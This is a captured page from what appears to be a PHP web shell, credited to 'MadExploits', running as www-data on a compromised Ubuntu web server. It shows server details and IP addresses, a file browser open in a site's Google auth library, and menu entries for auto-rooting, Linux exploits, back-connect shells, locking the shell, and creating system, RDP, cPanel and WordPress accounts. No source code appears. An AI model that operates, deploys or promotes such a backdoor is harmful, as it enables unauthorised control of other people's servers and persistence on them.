Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.231.17
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
crm.oxopackaging.com /
vendor /
google /
auth /
[ HOME SHELL ]
Name
Size
Permission
Action
src
[ DIR ]
drwxr-xr-x
COPYING
11.08
KB
-rw-r--r--
LICENSE
10.02
KB
-rw-r--r--
README.md
10.42
KB
-rw-r--r--
SECURITY.md
329
B
-rw-r--r--
VERSION
7
B
-rw-r--r--
autoload.php
1.09
KB
-rw-r--r--
composer.json
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SECURITY.md
# Security Policy To report a security issue, please use [g.co/vulnz](https://g.co/vulnz). The Google Security Team will respond within 5 working days of your report on g.co/vulnz. We use g.co/vulnz for our intake, and do coordination and disclosure here using GitHub Security Advisory to privately discuss and fix the issue.
Close